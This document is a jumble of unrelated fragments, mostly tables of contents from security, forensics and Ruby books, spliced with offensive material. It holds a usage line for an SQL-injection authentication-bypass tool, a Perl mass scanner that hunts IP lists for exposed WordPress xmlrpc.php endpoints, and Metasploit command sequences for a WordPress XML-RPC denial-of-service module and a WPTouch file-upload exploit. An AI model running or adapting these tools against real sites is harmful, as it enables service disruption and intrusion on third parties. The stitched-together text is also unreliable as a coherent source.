Database Initialization with Samhain and Tripwire 678
20.7
Securing the Baseline Storage with Samhain and Tripwire 680
20.8
Running Filesystem Checks with Samhain and Tripwire 682
20.9
Managing File Changes and Updating Storage Database
with Samhain and Tripwire 684
20.10
Recognizing Malicious Activity with Samhain and Tripwire 687
20.11
Log Monitoring with Logwatch 689
20.12
Improving Logwatch's Filters 690
20.13
Host Monitoring in Large Environments with Prelude-IDS 692
20.14
Conclusion 694
xii Table of Contents
Part VII
Discovery
21. Forensics
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
699
21.1
Netstat 700
21.2
The Forensic ToolKit 704
21.3
Sysinternals 710
22. Application Fuzzing
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
725
22.1
Which Fuzzer to Use 726
22.2
Different Types of Fuzzers for Different Tasks 727
22.3
Writing a Fuzzer with Spike 734
22.4
The Spike API 735
22.5
File-Fuzzing Apps 739
22.6
Fuzzing Web Applications 742
22.7
Configuring WebProxy 744
22.8
Automatic Fuzzing with WebInspect 746
22.9
Next-Generation Fuzzing 747
22.10
Fuzzing or Not Fuzzing 748
23. Binary Reverse Engineering
. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
749
23.1
Interactive Disassembler 749
23.2
Sysinternals 775
23.3
OllyDbg 776
23.4
Other Tools 781
pip install pyvirtualdisplay selenium
CS-SQL-Injection-Authentication-Bypass-Tool.py [--help] url [-username u] [-password p] [-submit s] [-visible v]
Cisco Network Security Little Black Book......................................................................................1
Introduction...4
Is this Book for You?...4
How to Use this Book...4
The Little Black Book Philosophy.............................................................................................6
Chapter 1: Securing the Infrastructure............................................................................................7
In Brief...7
Enterprise Security Problems.............................................................................................7
Types of Threats...8
Enterprise Security Challenges..........................................................................................8
Enterprise Security Policy..................................................................................................9
Securing the Enterprise...10
Immediate Solutions...14
Configuring Console Security...........................................................................................14
Configuring Telnet Security..............................................................................................16
Configuring Enable Mode Security...................................................................................17
Disabling Password Recovery.........................................................................................18
Configuring Privilege Levels for Users.............................................................................20
Configuring Password Encryption....................................................................................21
Configuring Banner Messages.........................................................................................22
Configuring SNMP Security.............................................................................................24
Configuring RIP Authentication........................................................................................25
Configuring EIGRP Authentication...................................................................................27
Configuring OSPF Authentication....................................................................................31
Configuring Route Filters.................................................................................................35
Suppressing Route Advertisements.................................................................................40
Chapter 2: AAA Security Technologies.........................................................................................43
In Brief...43
Access Control Security...................................................................................................43
AAA Protocols...48
Cisco Secure Access Control Server...............................................................................53
Immediate Solutions...56
Configuring TACACS+ Globally.......................................................................................56
Configuring TACACS+ Individually..................................................................................58
Configuring RADIUS Globally..........................................................................................61
Configuring RADIUS Individually.....................................................................................62
Configuring Authentication...............................................................................................64
Configuring Authorization.................................................................................................72
Configuring Accounting...75
Installing and Configuring Cisco Secure NT....................................................................78
Chapter 3: Perimeter Router Security............................................................................................85
In Brief...85
Defining Networks...85
Cisco Express Forwarding...............................................................................................86
Unicast Reverse Path Forwarding...................................................................................87
TCP Intercept...87
Chapter 3: Perimeter Router Security
Network Address Translation...........................................................................................89
Committed Access Rate...................................................................................................90
Logging...92
Immediate Solutions...93
Configuring Cisco Express Forwarding............................................................................93
Configuring Unicast Reverse Path Forwarding................................................................95
Configuring TCP Intercept................................................................................................98
Configuring Network Address Translation (NAT)...........................................................103
Configuring Committed Access Rate (CAR)..................................................................116
Configuring Logging...119
Chapter 4: IOS Firewall Feature Set.............................................................................................123
In Brief...123
Context−Based Access Control.....................................................................................123
Port Application Mapping...............................................................................................127
IOS Firewall Intrusion Detection.....................................................................................129
Immediate Solutions...131
Configuring Context−Based Access Control..................................................................131
Configuring Port Application Mapping............................................................................143
Configuring IOS Firewall Intrusion Detection.................................................................149
Chapter 5: Cisco Encryption Technology...................................................................................156
In Brief...156
Cryptography...156
Benefits of Encryption...160
Symmetric and Asymmetric Key Encryption..................................................................160
Digital Signature Standard.............................................................................................166
Cisco Encryption Technology Overview.........................................................................167
Immediate Solutions...168
Configuring Cisco Encryption Technology.....................................................................168
Chapter 6: Internet Protocol Security..........................................................................................189
In Brief...189
IPSec Packet Types...190
IPSec Modes of Operation.............................................................................................191
Key Management...193
Encryption...196
IPSec Implementations..................................................................................................197
Immediate Solutions...197
Configuring IPSec Using Pre−Shared Keys...................................................................198
Configuring IPSec Using Manual Keys..........................................................................214
Configuring Tunnel EndPoint Discovery........................................................................224
Chapter 7: Additional Access List Features...............................................................................231
In Brief...231
Wildcard Masks...233
Standard Access Lists...234
Extended Access Lists...................................................................................................234
Reflexive Access Lists...................................................................................................235
Chapter 7: Additional Access List Features
Dynamic Access Lists...236
Additional Access List Features.....................................................................................238
Immediate Solutions...239
Configuring Standard IP Access Lists............................................................................239
Configuring Extended IP Access Lists...........................................................................242
Configuring Extended TCP Access Lists.......................................................................247
Configuring Named Access Lists...................................................................................250
Configuring Commented Access Lists...........................................................................252
Configuring Dynamic Access Lists.................................................................................254
Configuring Reflexive Access Lists................................................................................260
Configuring Time−Based Access Lists..........................................................................263
Appendix A: IOS Firewall IDS Signature List..............................................................................266
Appendix B: Securing Ethernet Switches...................................................................................272
Configuring Management Access........................................................................................272
Configuring Port Security...273
Configuring Permit Lists...275
Configuring AAA Support...276
Introduction
xxv
Chapter 1 Looking at the Ecosystem
1
Chapter 2 Android Security Design and Architecture 25
Chapter 3 Rooting Your Device 57
Chapter 4 Reviewing Application Security 83
Chapter 5 Understanding Android's Attack Surface 129
Chapter 6 Finding Vulnerabilities with Fuzz Testing 177
Chapter 7 Debugging and Analyzing Vulnerabilities 205
Chapter 8 Exploiting User Space Software 263
Chapter 9 Return Oriented Programming 291
Chapter 10 Hacking and Attacking the Kernel 309
Chapter 11 Attacking the Radio Interface Layer 367
Chapter 12 Exploit Mitigations 391
Chapter 13 Hardware Attacks 423
Appendix A Tool Catalog 485
Appendix B Open Source Repositories 501
Appendix C References 511
Index 523
Chapter 1 Live Response: Collecting Volatile Data . . . . . . 1
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2
Live Response . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .2
Locard's Exchange Principle . . . . . . . . . . . . . . . . . . . . . .4
Order of Volatility . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .6
When to Perform Live Response . . . . . . . . . . . . . . . . . . .8
What Data to Collect . . . . . . . . . . . . . . . . . . . . . . . . . . . . .10
System Time . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .12
Logged-on Users . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
Psloggedon . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
Net Sessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .14
Logonsessions . . . . . . . . . . . . . . . . . . . . . . . . . . . . .15
Open Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .16
Network Information (Cached NetBIOS Name Table) . .17
Network Connections . . . . . . . . . . . . . . . . . . . . . . . . . .18
Netstat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .19
Process Information . . . . . . . . . . . . . . . . . . . . . . . . . . . .21
Tlist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .23
Tasklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24
Pslist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24
Listdlls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .24
Handle . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .25
Process-to-Port Mapping . . . . . . . . . . . . . . . . . . . . . . . .28
Netstat . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .28
Fport . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .29
Openports . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .30
Process Memory . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .31
Network Status . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Ipconfig . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .32
Promiscdetect and Promqry . . . . . . . . . . . . . . . . . . .32
Clipboard Contents . . . . . . . . . . . . . . . . . . . . . . . . . . . .35
Service/Driver Information . . . . . . . . . . . . . . . . . . . . . .36
xiii
xiv
Contents
Command History . . . . . . . . . . . . . . . . . . . . . . . . . . . .38
Mapped Drives . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .39
Shares . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .40
Nonvolatile Information . . . . . . . . . . . . . . . . . . . . . . . . . .40
Registry Settings . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .41
ClearPageFileAtShutdown . . . . . . . . . . . . . . . . . . . . .41
DisableLastAccess . . . . . . . . . . . . . . . . . . . . . . . . . . .41
AutoRuns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .42
Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .45
Devices and Other Information . . . . . . . . . . . . . . . . . . .46
A Word about Picking Your Tools... . . . . . . . . . . . . . . . .46
Live-Response Methodologies . . . . . . . . . . . . . . . . . . . . . . .48
Local Response Methodology . . . . . . . . . . . . . . . . . . . .48
Remote Response Methodology . . . . . . . . . . . . . . . . . .50
The Hybrid Approach . . . . . . . . . . . . . . . . . . . . . . . . . .52
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .56
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .59
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . . .61
Chapter 2 Live Response: Data Analysis. . . . . . . . . . . . . . 63
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .64
Data Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .64
Example Case 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .67
Example Case 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .71
Agile Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .75
Expanding the Scope . . . . . . . . . . . . . . . . . . . . . . . . . . .78
Reaction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .80
Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .82
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .84
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .84
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .85
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . . .86
Chapter 3 Windows Memory Analysis . . . . . . . . . . . . . . . 87
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88
A Brief History . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .88
Contents
Dumping Physical Memory . . . . . . . . . . . . . . . . . . . . . . . .89
Hardware Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . .90
FireWire . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .90
Crash Dumps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .92
Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .94
Hibernation File . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .96
DD . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .96
Analyzing a Physical Memory Dump . . . . . . . . . . . . . . . . . .99
Process Basics . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .100
EProcess Structure . . . . . . . . . . . . . . . . . . . . . . . . .100
Process Creation Mechanism . . . . . . . . . . . . . . . . . .102
Parsing Memory Contents . . . . . . . . . . . . . . . . . . . . . .103
Lsproc.pl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .104
Lspd.pl . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .107
Parsing Process Memory . . . . . . . . . . . . . . . . . . . . . . .109
Extracting the Process Image . . . . . . . . . . . . . . . . . . . .111
Memory Dump Analysis and the Page File . . . . . . . . . .114
Determining the Operating System of a Dump File . . .115
Pool Allocations . . . . . . . . . . . . . . . . . . . . . . . . . . . . .117
Collecting Process Memory . . . . . . . . . . . . . . . . . . . . . . . .117
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .120
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .120
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . .122
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . .123
Chapter 4 Registry Analysis . . . . . . . . . . . . . . . . . . . . . . . 125
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .126
Inside the Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .127
Registry Structure within a Hive File . . . . . . . . . . . . . .130
The Registry As a Log File . . . . . . . . . . . . . . . . . . . . .135
Monitoring Changes to the Registry . . . . . . . . . . . . . .137
Registry Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .139
System Information . . . . . . . . . . . . . . . . . . . . . . . . . . .140
TimeZoneInformation . . . . . . . . . . . . . . . . . . . . . .142
Shares . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .142
Audit Policy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .143
Wireless SSIDs . . . . . . . . . . . . . . . . . . . . . . . . . . . .144
Autostart Locations . . . . . . . . . . . . . . . . . . . . . . . . . . .145
xv
xvi
Contents
System Boot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .148
User Login . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .148
User Activity . . . . . . . . . . . . . . . . . . . . . . . . . . . . .149
Enumerating Autostart Registry Locations . . . . . . . . . .153
USB Removable Storage Devices . . . . . . . . . . . . . . . . .155
USB Device Issues . . . . . . . . . . . . . . . . . . . . . . . . .158
Mounted Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . .160
Finding Users . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .164
Tracking User Activity . . . . . . . . . . . . . . . . . . . . . . . . .167
The UserAssist keys . . . . . . . . . . . . . . . . . . . . . . . .168
MRU Lists . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .172
Search Assistant . . . . . . . . . . . . . . . . . . . . . . . . . . . .175
Connecting to Other Systems . . . . . . . . . . . . . . . . .176
IM and P2P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .177
Windows XP System Restore Points . . . . . . . . . . . . . .178
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .184
DVD Contents . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .184
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .185
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . .187
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . .188
Chapter 5 File Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . 191
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .192
Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .192
Understanding Events . . . . . . . . . . . . . . . . . . . . . . . . .193
Event Log File Format . . . . . . . . . . . . . . . . . . . . . . . . .198
Event Log Header . . . . . . . . . . . . . . . . . . . . . . . . . . . .198
Event Record Structure . . . . . . . . . . . . . . . . . . . . . . . .200
Vista Event Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . .204
IIS Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .206
Internet Explorer Browsing History . . . . . . . . . . . . . . .210
Other Log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .211
Setuplog.txt . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .211
Setupact.log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .213
SetupAPI.log . . . . . . . . . . . . . . . . . . . . . . . . . . . . .213
Netsetup.log . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .214
Task Scheduler Log . . . . . . . . . . . . . . . . . . . . . . . . .214
XP Firewall Logs . . . . . . . . . . . . . . . . . . . . . . . . . .216
Contents
Dr. Watson Logs . . . . . . . . . . . . . . . . . . . . . . . . . . .219
Crash Dump Files . . . . . . . . . . . . . . . . . . . . . . . . . .220
Recycle Bin . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .221
System Restore Points . . . . . . . . . . . . . . . . . . . . . . . . .224
Rp.log Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .224
Change.log.x Files . . . . . . . . . . . . . . . . . . . . . . . . .225
Prefetch Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .226
Shortcut Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .229
File Metadata . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .230
Word Documents . . . . . . . . . . . . . . . . . . . . . . . . . . . .232
PDF Documents . . . . . . . . . . . . . . . . . . . . . . . . . . . . .238
Image Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .239
File Signature Analysis . . . . . . . . . . . . . . . . . . . . . . . . .240
NTFS Alternate Data Streams . . . . . . . . . . . . . . . . . . .241
Creating ADSes . . . . . . . . . . . . . . . . . . . . . . . . . . .243
Enumerating ADSes . . . . . . . . . . . . . . . . . . . . . . . .244
Using ADSes . . . . . . . . . . . . . . . . . . . . . . . . . . . . .247
Removing ADSes . . . . . . . . . . . . . . . . . . . . . . . . . .249
ADS Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . .250
Alternative Methods of Analysis . . . . . . . . . . . . . . . . . . . . .250
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .255
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . .257
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . .258
Chapter 6 Executable File Analysis . . . . . . . . . . . . . . . . . 261
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .262
Static Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .262
Documenting the File . . . . . . . . . . . . . . . . . . . . . . . . .263
Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .265
The PE Header . . . . . . . . . . . . . . . . . . . . . . . . . . .268
Import Tables . . . . . . . . . . . . . . . . . . . . . . . . . . . . .275
Export Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .278
Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .279
Obfuscation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .281
Dynamic Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .287
Testing Environment . . . . . . . . . . . . . . . . . . . . . . . . . .288
Virtualization . . . . . . . . . . . . . . . . . . . . . . . . . . . . .288
xvii
xviii
Contents
Throwaway Systems . . . . . . . . . . . . . . . . . . . . . . . .290
Tools . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .291
Process . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .295
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .301
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .301
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . .304
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . .305
Chapter 7 Rootkits and Rootkit Detection . . . . . . . . . . . 307
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .308
Rootkits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .308
Rootkit Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .314
Live Detection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .314
RootkitRevealer . . . . . . . . . . . . . . . . . . . . . . . . . . .316
GMER . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .317
Helios . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .318
MS Strider GhostBuster . . . . . . . . . . . . . . . . . . . . . . . .320
ProDiscover . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .320
F-Secure BlackLight . . . . . . . . . . . . . . . . . . . . . . . . . .321
Sophos Anti-Rootkit . . . . . . . . . . . . . . . . . . . . . . . . . .322
AntiRootkit.com . . . . . . . . . . . . . . . . . . . . . . . . . . . . .323
Post-Mortem Detection . . . . . . . . . . . . . . . . . . . . . . . .323
Prevention . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .326
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .328
Notes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .328
Solutions Fast Track . . . . . . . . . . . . . . . . . . . . . . . . . . . . .329
Frequently Asked Questions . . . . . . . . . . . . . . . . . . . . . . .330
Index . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 333
#made by Vypor
#2:35 AM
#4/6/2014
#Made for the request of: Matt
#161rum.com
use HTML::Parser;
use LWP::UserAgent;
use LWP::Simple;
use Parallel::ForkManager;
use Term::ANSIColor;
use vars qw( $PROG );
( $PROG = $0 ) =~ s/^.*[\/\\]//;
if ( @ARGV == 0 ) {
print "[!] Usage: ./$PROG [IPLIST] [THREADS] [OUTPUT] [TIMEOUT]\n[!] Example: ./$PROG ips.txt 100 output.txt 10\nMade by Vypor\nhttp://pastebin.com/u/Autism\n";
exit;
}
$SIG{'INT'} = sub {exit;};
my @folders = ("/wordpress/", "/wp/", "blog", "/");
my $stringsearch = "XML-RPC";
my $filename = $ARGV[2];
my $max_processes = $ARGV[1];
my $pm = Parallel::ForkManager->new($max_processes);
my $weblist = $ARGV[0];
open my $handle, '<', $weblist;
chomp(my @webservers = <$handle>);
close $handle;
print "\e[33m[!] Starting\n\e[0m";
print "\e[33m[!] Using input list: $ARGV[0] | Output list: $filename\n\e[0m";
print "\e[33m[!] Using $ARGV[1] Fork's\n\e[0m";
print "\e[33m[!] Using Vypor's Wordpress Scanner 161rum.com\n\e[0m";
sleep("3");
for my $strat (@webservers) {
foreach (@folders) {
my $pid - $pm->start and next;
alarm("$ARGV[3]");
my $url = "http://$strat" . "$_" . "xmlrpc.php";
my $ua = LWP::UserAgent->new;
print "\e[96m[!]Searching \e[31m$url\n\e[0m";
my $response = $ua->get($url);
if ( !$response->is_success ) {
}
if (head($url)) {
my $parser = HTML::Parser->new( 'text_h' => [ \&text_handler, 'dtext' ] );
$parser->parse( $response->decoded_content );
sub text_handler {
chomp( my $text = shift );
if ( $text =~ /$stringsearch/i ) {
my $ui = $url;
$ui =~ s/xmlrpc.php/?feed=rss2/;
if (head($ui)) {
sub check {
$LOLGETIT=get($ui);
$LOLGETIT =~ /<item>.+?<link>(.+?)<\/link>.+?<\/item>/s;
if ($1) {
open (FILE, ">>$filename");
my $post = $1;
$ui =~ s{\Q?feed=rss2\E}{xmlrpc.php};
print FILE "$ui $post\n";
close (FILE);
print "\e[96m[+]Found: \e[32m$ui $post\e[0m\n";
exec($^X, "-e", "sleep 1,kill(0,$pid)||kill -9,$pid");
}
}
check();
} else {
} }
}
} else {
}
$pm->finish;
}
}
1.
Introduction . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
Lexical Structure
Syntactic Structure
File Structure
Program Encoding
Program Execution
Datatypes and Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41
The Structure and Execution of Ruby Programs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25
A Tour of Ruby
Try Ruby
About This Book
A Sudoku Solver in Ruby
Numbers
Text
Arrays
Hashes
Ranges
Symbols
True, False, and Nil
Objects
Expressions and Operators . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Literals and Keyword Literals
Variable References
Constant References
Method Invocations
Assignments
Operators
Statements and Control Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 117
Defining Simple Methods
Method Names
Methods and Parentheses
Method Arguments
Procs and Lambdas
Closures
Method Objects
Functional Programming
Methods, Procs, Lambdas, and Closures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 175
Conditionals
Loops
Iterators and Enumerable Objects
Blocks
Altering Control Flow
Exceptions and Exception Handling
BEGIN and END
Threads, Fibers, and Continuations
Defining a Simple Class
Method Visibility: Public, Protected, Private
Subclassing and Inheritance
Object Creation and Initialization
Modules
Loading and Requiring Modules
Singleton Methods and the Eigenclass
Method Lookup
Constant Lookup
Reflection and Metaprogramming . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265
Types, Classes, and Modules
Evaluating Strings and Blocks
Variables and Constants
Methods
Hooks
Tracing
ObjectSpace and GC
Custom Control Structures
Missing Methods and Missing Constants
Dynamically Creating Methods
Alias Chaining
vi | Table of Contents
8.12 Domain-Specific Languages
9.
296
The Ruby Platform . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 303
10.5
Invoking the Ruby Interpreter
The Top-Level Environment
Practical Extraction and Reporting Shortcuts
Calling the OS
Security
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos
msf auxiliary(wordpress_xmlrpc_dos) > show actions
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>
msf auxiliary(wordpress_xmlrpc_dos) > show options
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run
msf > use exploit/unix/webapp/wp_wptouch_file_upload
msf exploit(wp_wptouch_file_upload) > show targets
...targets...
msf exploit(wp_wptouch_file_upload) > set TARGET <target-id>
msf exploit(wp_wptouch_file_upload) > show options
...show and set options...
msf exploit(wp_wptouch_file_upload) > exploit
